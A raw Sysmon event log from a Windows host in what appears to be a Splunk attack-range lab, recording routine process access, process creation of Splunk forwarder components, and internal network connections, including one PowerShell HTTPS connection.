15:05:17.979{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343496Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-742D-613B-5DB4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343495Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.979{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-742D-613B-5DB4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.964{B81B27B7-742D-613B-5DB4-03000000C801}3604C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:43.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52562-false10.0.1.12-8000- 23542300x800000000000000035343492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.348{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7DDA8382B68E8497FB9E25BB9583C5F8,SHA256=3242119480F1EACA0DF237BF6A9BB4873F1A213C8F671E3468FA766F8E33AC7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-742D-613B-5CB4-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343487Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-742D-613B-5CB4-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343486Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343485Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.279{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-742D-613B-5CB4-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343484Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:17.264{B81B27B7-742D-613B-5CB4-03000000C801}912C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035343534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:43.231{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52563-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035343533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:05:18.310{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 